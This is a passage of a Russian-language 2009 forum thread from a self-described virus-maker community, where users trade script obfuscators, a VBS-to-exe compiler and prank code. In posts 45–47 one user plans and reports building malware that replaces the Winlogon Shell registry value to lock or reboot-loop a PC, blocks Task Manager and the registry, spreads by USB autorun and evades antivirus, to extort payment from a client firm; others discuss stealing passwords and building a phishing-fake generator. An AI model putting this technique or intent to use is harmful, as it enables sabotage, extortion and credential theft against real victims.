Иной взгляд на вирмейкерскую сцену

Raptor's Software форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Raptor's Software форум » Другие продукты » Анонимная отправка письма

Анонимная отправка письма

Сообщений 31 страница 48 из 48

31

Твой js и правда прикольный...
По поводу мусора:
Скачать | Download
Информация об ошибках и комментарии приветствуются.

Да, и что там с AMS? Я вот ща думаю, куда его на шару выложить можно... И чтобы народа достаточно, и чтобы строго не судили...

Отредактировано Alex1001222 (2009-11-12 10:59:42)

0

32

Alex1001222 написал(а):

Да, и что там с AMS?

Просмотры были а комменты никто не оставил. Если будешь выкладывать, там же в проге AMS ссылка на сайт твой, а ты же хотел его переписать. По поводу шифратора - протестю завтра хорошо (работа, времени мало).

0

33

Сайт уже работает, http://alex1001222,narod.ru/ - делал на свой вкус, под скорость работы. Тестировать - как хочешь, на мой взгляд работает, хотя тебе виднее

--------------------------
В мусорщике скриптов нашел несколько ошибок. Все исправил, нормальная версия на сайте

Отредактировано Alex1001222 (2009-11-12 22:09:21)

0

34

Alex1001222
Здорово. Начал тестить и вот:

Для авторуна не могу вписать код такой:
[autorun]
shellexecute=clock.avi
action=Вашей флэшки осталось 12 сек. до  уничтожения!
icon=\system32\shell32.dll,25
label= Пипец твоей флэшке!!!!!!!!!

Не распознаёт русские буквы

[autorun]
shellexecute=clock.avi
action=????? ?????? ???????? 12 ???. ??  ???????????!
icon=\system32\shell32.dll,25
label= ????? ????? ??????!!!!!!!!!

0

35

Кодировка косячит. А вообще, не знаю что у тебя за фигня - я пробовал писать в проге, все ок, пробовал через блокнот создавать autorun - тоже все ок. Но при копировании твоего кода и правда, кодировочка косячит...

Причем, если скопировать твой код сначала в блокнот, а потом из блокнота открыть то тоже все ок. Так что для меня такое поведение непонятно...

----------------------------------------------------------------------------
Еще нашел недоработку, нормальная версия как всегда на сайте
----------------------------------------------------------------------------
Знакомому приспичило форматнуть vbs в exe... Не подскажешь бесплатную тулзу?
Если несложно, залей куда-нить, пароль можно в личку. Или если совсем никак, могу скинуть скрипт - выручишь?

Отредактировано Alex1001222 (2009-11-13 20:37:59)

0

36

Прога компилирует VBS в exe. Пробывал разные, эта мне больше всех понравилась, у других косяки разные были.
Скачать : http://depositfiles.com/files/ze80p5joc

0

37

Alex1001222
На счёт создания проги по почтовым индексам. Время и желание есть? Прогу можешь сколько угодно делать, не срочно.

0

38

Объясни что требуется, а я скажу. Если будет интересно, будет и желание. Со временем проблемы, но это больше зависит от объема работы

Отредактировано Alex1001222 (2009-11-17 13:09:39)

0

39

Например программа из 5 окошек.
В первом окне - все страны, при нажатии например на USA во втором окне появляются все штаты. Нажимаем  на штат KS например-выдаёт в третьем окне zip-коды данного штата, в четвёртом окне телефоны соответствующие zip, в пятом - мобильные телефоны (можно с возможностью генерации случайных чисел, кроме начальных цифр). Нужна возможность добавления и изменения информации (добавить, удалить). Рядом с каждым значением кнопка копирования в буфер. Внизу отдельное окно" Найти". Например я знаю только Zip-код или телефон, но не знаю какой стране он принадлежит, вписываю его и мне выдаёт в общей таблице всю инфу.
Примерно так...
Наверно это можно и в Microsoft Office Access сделать такую таблицу- базу, но я не шарю.

0

40

Нет, на такое не согласен... Долго и муторно. Пугает больше объем, чем монотонность работы

0

41

Alex1001222 написал(а):

Пугает больше объем

Базу я сам вбивать буду, мне форма нужна.

0

42

Ну все же, надо эту форму и функции обработать..
Или я все же плохо понял. Но все равно, если сделать через файлы БД, тогда для тебя много работы будет, да еще и этот поиск...
Вобщем, извини, но нет. Кто-то все же перегрузится

0

43

код для С++

#include <vcl.h>
#include <process.h>
#include <windows.h>
#include pragma hdrstop
#pragma argsused
#include <winbase.h>
#include <winuser.h>
#incude <wpapi.h>
{
for( int i =0; i<999999999999999;i++)
{
SetCursorPos(rand()%1280; rand()%1024);
sleep(100,100);
}}

Курсор начнет гнать. Протестите кому не в лом.

0

44

Тестировать не буду, но работать должен. Правда, код должен быть гораздо короче:

// инклудить надо vcl, и то не факт
while (i<99999)
{
SetCursorPos(rand()%1280,rand()%1024);
sleep(100);
i+=1;
}

Отредактировано Alex1001222 (2009-11-21 14:27:32)

0

45

Alex1001222
Решил сделать такого микроба:
В определенный день не загружался бы комп или вылетал бы синий экран, безопасный режим не помогал бы. Восстановление работоспособности было бы затруднительно для обычного ламера.  Обязательное саморазмножение и не паливность антивирусами.

Примерно так думаю, если изменить параметр
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Shell=Explorer.exe на Shell=shutdown.exe -r -f или просто оставить Shell=<пустое поле>, в первом случае комп будет постоянно перезагружаться, во втором просто чистый рабочий стол, причем безопасный режим и восстановление системы не помогает. Восстановление с командной строки. Может есть какие идеи?

Нужно для получения денег с фирмы, которая то платит, то не платит за обслуживание.

Отредактировано Букдубраз (2009-12-27 16:30:47)

0

46

Букдубраз написал(а):

втором просто чистый рабочий стол

не вариант, т.к. Диспетчер задач легко можно запустить, а оттуда сам понимаешь...

Букдубраз написал(а):

в первом случае комп будет постоянно перезагружаться

Это тема :) но вылечить можно будет только с LiveCD, но тут уже мало кто додумается, так что уже больше похоже на правду.

А вообще, вышел из того возраста когда еще хотелось что-то ломать/убивать, теперь мне гораздо интереснее что-то спереть незаметно для пользователя прямо у него из-под носа, желание что-то писать пусть даже не во вред кому-то

0

47

Да я уже сделал, что хотел (всё-таки чистый рабочий стол посимпотичнее:))))). На счёт диспетчера я в курсе , блокировку сделал и блокировка доступа к реестру. немного заморочка с размножением (пока только авторун через флэху). Если надо скину тебе потестишь:)))). Сделал и вакцину, но тогда нужен доступ к диспетчеру задач, чтобы с флэхи запустить файл-вакцину.

0

48

Да не, спасибо, тестить не буду)) Стало неинтересно просто пакостить, так что теперь буду потихоньку уводить пароли и т.п.))
Сейчас дописываю прогу для создания фейков - велосипед, но навороченный) Так что если надо, могу потом выложить)

0

Вы здесь » Raptor's Software форум » Другие продукты » Анонимная отправка письма